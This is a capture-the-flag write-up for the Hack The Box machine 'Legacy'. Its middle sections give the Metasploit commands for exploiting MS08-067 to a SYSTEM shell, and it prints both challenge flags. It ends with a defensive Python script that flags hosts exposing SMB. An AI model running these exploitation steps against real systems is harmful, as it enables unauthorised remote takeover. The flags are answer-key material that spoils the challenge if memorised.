Table of contents
Connect to the HTB server and start the target machine
1.How many TCP ports are open on Legacy?
2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?
3.What is the name of the Metasploit module that exploits CVE-2008-4250?
4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.
5.Submit the flag located on the john user's desktop.
USER_FLAG:e69af0e4f443de7e36876fda4ec7644f
6.Submit the flag located on the administrator's desktop.
ROOT_FLAG:993442d258b0e0ec917cae9e695d5713
7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?
Connect to the HTB server and start the target machine
Target IP: 10.10.10.4
Assigned IP: 10.10.16.7
1.How many TCP ports are open on Legacy?
Port-scan the target with fscan:
fscan -nopoc -nobr -no -h {TARGET_IP}
The fscan output shows the target has ports 135, 139 and 445 open, i.e. 3 ports in total.
2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?
A Google search gives: CVE-2008-4250 (MS08-067)
Note: the answer to this question actually appears in the text of the next question.
3.What is the name of the Metasploit module that exploits CVE-2008-4250?
Start Metasploit:
msfconsole
Search for a module for CVE-2008-4250:
search cve:CVE-2008-4250
So the module that exploits this vulnerability is named: ms08_067_netapi
4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.
Select the module:
use exploit/windows/smb/ms08_067_netapi
Set the target IP:
set rhosts {TARGET_IP}
Set the assigned (local) IP:
set lhost {NATIVE_IP}
Run the exploit:
exploit
Check the current user:
getuid
The user the session is running as on the server is: NT AUTHORITY\SYSTEM
5.Submit the flag located on the john user's desktop.
Start a cmd shell:
shell
Change to the john user's desktop:
cd C:\Documents and Settings\john\Desktop
Display the contents of user.txt:
type user.txt
USER_FLAG:e69af0e4f443de7e36876fda4ec7644f
6.Submit the flag located on the administrator's desktop.
Change to the Administrator user's desktop:
cd C:\Documents and Settings\Administrator\Desktop
Display the contents of root.txt:
type root.txt
ROOT_FLAG:993442d258b0e0ec917cae9e695d5713
7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?
This refers to the MS17-010 vulnerability; a quick Baidu or Google search gives its CVE ID:
MS17-010 remote overflow vulnerability (EternalBlue): CVE-2017-0143
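The two findings that matter for a defender on this box are the open-port count from question 1 and the SMB advisories from questions 2 and 7. The following is an added example, not part of the writeup: a small Python triage that parses a constructed `ip:port open` scan listing (the format is an assumption, not fscan's real output), counts open TCP ports per host, and flags any host exposing SMB (139/445) together with the two advisories named on the page that must be verified as patched. Patch status is not inferred; the script only says what to check.

```python
# Added example, not from the original writeup. Parses a constructed scan
# listing and flags hosts exposing SMB so the two advisories named in the
# writeup (MS08-067 / CVE-2008-4250 and MS17-010 / CVE-2017-0143) can be
# verified as patched. The line format "ip:port open" is an assumption.

from collections import defaultdict

SMB_PORTS = {139, 445}          # SMB over NetBIOS and SMB direct

# Advisories referenced on the page; an unpatched host exposing SMB needs both.
SMB_RCE_ADVISORIES = {
    "MS08-067": "CVE-2008-4250",
    "MS17-010": "CVE-2017-0143",
}

# Constructed sample listing: first host mirrors the Legacy result on the page
# (135, 139, 445), the second is a constructed host with no SMB exposure.
CONSTRUCTED_SCAN = """\
10.10.10.4:135 open
10.10.10.4:139 open
10.10.10.4:445 open
192.0.2.10:22 open
192.0.2.10:80 open
"""


def parse_scan(text):
    """Return {ip: set(open_tcp_ports)} from 'ip:port open' lines.

    Lines that do not match the assumed format are skipped rather than
    raising, so a partially garbled listing still yields a usable inventory.
    """
    hosts = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 2 or parts[1].lower() != "open":
            continue
        ip, _, port = parts[0].rpartition(":")
        if not ip or not port.isdigit():
            continue
        hosts[ip].add(int(port))
    return dict(hosts)


def count_open_tcp_ports(hosts, ip):
    """Number of open TCP ports recorded for one host (question 1)."""
    return len(hosts.get(ip, set()))


def smb_exposure(hosts, ip):
    """Advisories to verify if SMB is reachable on the host, else {}."""
    if hosts.get(ip, set()) & SMB_PORTS:
        return dict(SMB_RCE_ADVISORIES)
    return {}


def triage(text):
    """Per-host summary: port count, SMB exposure flag, patches to verify."""
    hosts = parse_scan(text)
    report = {}
    for ip in sorted(hosts):
        advisories = smb_exposure(hosts, ip)
        report[ip] = {
            "open_tcp_port_count": count_open_tcp_ports(hosts, ip),
            "smb_exposed": bool(advisories),
            "patches_to_verify": sorted(advisories),
        }
    return report


if __name__ == "__main__":
    for ip, summary in triage(CONSTRUCTED_SCAN).items():
        print(ip, summary)
```

The report for the constructed listing shows 10.10.10.4 with 3 open ports, SMB exposed, and both MS08-067 and MS17-010 to verify; the second host has no SMB ports and nothing to check. The port count alone is what answers question 1 on the real box; the advisory list is the follow-up a patch owner needs.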